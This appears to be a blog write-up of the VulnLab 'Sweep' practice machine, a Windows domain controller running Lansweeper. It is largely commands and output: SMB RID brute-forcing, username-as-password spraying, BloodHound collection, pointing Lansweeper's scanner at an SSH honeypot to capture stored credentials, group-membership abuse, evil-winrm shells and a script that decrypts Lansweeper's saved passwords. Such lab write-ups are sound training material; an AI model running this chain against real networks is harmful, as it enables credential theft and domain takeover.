vulnlab-sweep

vulnlab sweep

a medium windows machine

tools used : crackmapexec , bloodhound-python , sshesame , evil-winrm

nmap scan

# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128
Nmap scan report for 10.10.80.128
Host is up (0.022s latency).
Not shown: 985 filtered tcp ports (no-response)
PORT     STATE SERVICE           VERSION
53/tcp   open  domain            Simple DNS Plus
81/tcp   open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
82/tcp   open  ssl/http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp   open  kerberos-sec      Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z)
135/tcp  open  msrpc             Microsoft Windows RPC
139/tcp  open  netbios-ssn       Microsoft Windows netbios-ssn
389/tcp  open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http        Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ldapssl?
3268/tcp open  ldap              Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name)
3269/tcp open  globalcatLDAPssl?
3389/tcp open  ms-wbt-server     Microsoft Terminal Services
5357/tcp open  http              Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds

Enumerate

Brute Force SMB

┌──(puck㉿kali)-[~/vulnlab/sweep]
crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute
SMB         10.10.80.128    445    INVENTORY        [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False)
SMB         10.10.80.128    445    INVENTORY        [+] sweep.vl\Guest: 
SMB         10.10.80.128    445    INVENTORY        [+] Enumerated shares
SMB         10.10.80.128    445    INVENTORY        Share           Permissions     Remark
SMB         10.10.80.128    445    INVENTORY        -----           -----------     ------
SMB         10.10.80.128    445    INVENTORY        ADMIN$                          Remote Admin
SMB         10.10.80.128    445    INVENTORY        C$                              Default share
SMB         10.10.80.128    445    INVENTORY        DefaultPackageShare$ READ            Lansweeper PackageShare
SMB         10.10.80.128    445    INVENTORY        IPC$            READ            Remote IPC
SMB         10.10.80.128    445    INVENTORY        Lansweeper$                     Lansweeper Actions
SMB         10.10.80.128    445    INVENTORY        NETLOGON                        Logon server share 
SMB         10.10.80.128    445    INVENTORY        SYSVOL                          Logon server share 
SMB         10.10.80.128    445    INVENTORY        [+] Brute forcing RIDs
SMB         10.10.80.128    445    INVENTORY        498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        500: SWEEP\Administrator (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        501: SWEEP\Guest (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        502: SWEEP\krbtgt (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        512: SWEEP\Domain Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        513: SWEEP\Domain Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        514: SWEEP\Domain Guests (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        515: SWEEP\Domain Computers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        516: SWEEP\Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        517: SWEEP\Cert Publishers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        518: SWEEP\Schema Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        519: SWEEP\Enterprise Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        520: SWEEP\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        521: SWEEP\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        522: SWEEP\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        525: SWEEP\Protected Users (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        526: SWEEP\Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        527: SWEEP\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        553: SWEEP\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1000: SWEEP\INVENTORY$ (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1101: SWEEP\DnsAdmins (SidTypeAlias)
SMB         10.10.80.128    445    INVENTORY        1102: SWEEP\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1103: SWEEP\Lansweeper Admins (SidTypeGroup)
SMB         10.10.80.128    445    INVENTORY        1113: SWEEP\jgre808 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1114: SWEEP\bcla614 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1115: SWEEP\hmar648 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1116: SWEEP\jgar931 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1117: SWEEP\fcla801 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1118: SWEEP\jwil197 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1119: SWEEP\grob171 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1120: SWEEP\fdav736 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1121: SWEEP\jsmi791 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1122: SWEEP\hjoh690 (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1123: SWEEP\svc_inventory_win (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1124: SWEEP\svc_inventory_lnx (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        1125: SWEEP\intern (SidTypeUser)
SMB         10.10.80.128    445    INVENTORY        3101: SWEEP\Lansweeper Discovery (SidTypeGroup)

make a users file and crack it with username=password

cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt
crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success

Bloodhound Enum

┌──(puck㉿kali)-[~/vulnlab/sweep]
bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip    
INFO: Found AD domain: sweep.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: inventory.sweep.vl
INFO: Found 17 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: inventory.sweep.vl
INFO: Done in 00M 06S
INFO: Compressing output into 20240617132345_bloodhound.zip

Login to browser as user intern on http://sweep.vl:81/ , go to scanning -> scanning credentials ( see that saved creds are used ), go to scanning -> scanning targets -> add range target vulnab vpn ip , and use saved creds

 

and on Kali machine  run SSH Honeypot, I used sshesame, tthe only thing important to change is the sshesame.yaml file

and set listen_address: 10.8.2.138:22 [ in my case]

┌──(puck㉿kali)-[~/vulnlab/sweep]
└─$ ./sshesame-linux-amd64 --config sshesame.yaml
INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame"
INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22
WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF
WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected
2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted
2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested
2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed
2024/06/17 14:53:46 [10.10.80.128:51633] connection closed
2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected

Logon now to http://sweep.vl:81/Default.aspx as user svc-inventory-lnx

do your thing with more privs

or simpler way after adding svc_inventory_lnx to the “Lansweeper Admins” group.

unintended way : https://github.com/Yeeb1/SharpLansweeperDecrypt

But 1st as Bloodhound suggests:

Full control of a group allows you to directly modify group membership of the group.

Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:

┌──(puck㉿kali)-[~/vulnlab/sweep]
net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl
Password for [SWEEP\svc_inventory_lnx]:

then Win-RM to the box

┌──(puck㉿kali)-[~/vulnlab/sweep]
evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED' 

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1
                                        
Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1
                                        
Data: 5700 bytes of 5700 bytes copied
                                        
Info: Upload successful!
*Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1
[+] Loading web.config file...
[+] Found protected connectionStrings section. Decrypting...
[+] Decrypted connectionStrings section:
<connectionStrings>
    <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name=&quot;LsService Core .Net SqlClient Data Provider&quot;" providerName="System.Data.SqlClient" />
</connectionStrings>
[+] Opening connection to the database...
[+] Retrieving credentials from the database...
[+] Decrypting password for user: SNMP Community String
[+] Decrypting password for user:
[+] Decrypting password for user: SWEEP\svc_inventory_win
[+] Decrypting password for user: svc_inventory_lnx
[+] Credentials retrieved and decrypted successfully:

CredName          Username                Password
--------          --------                --------
SNMP-Private      SNMP Community String   private
Global SNMP                               public
Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED>
Inventory Linux   svc_inventory_lnx       0|5<REDACTED>

then Winrm to the box as admin

──(puck㉿kali)-[~/vulnlab/sweep]
└─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>'

                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>



 

 

 

 

 

 

 

 

.

 

 

Posted on

Leave a Reply

Your email address will not be published. Required fields are marked *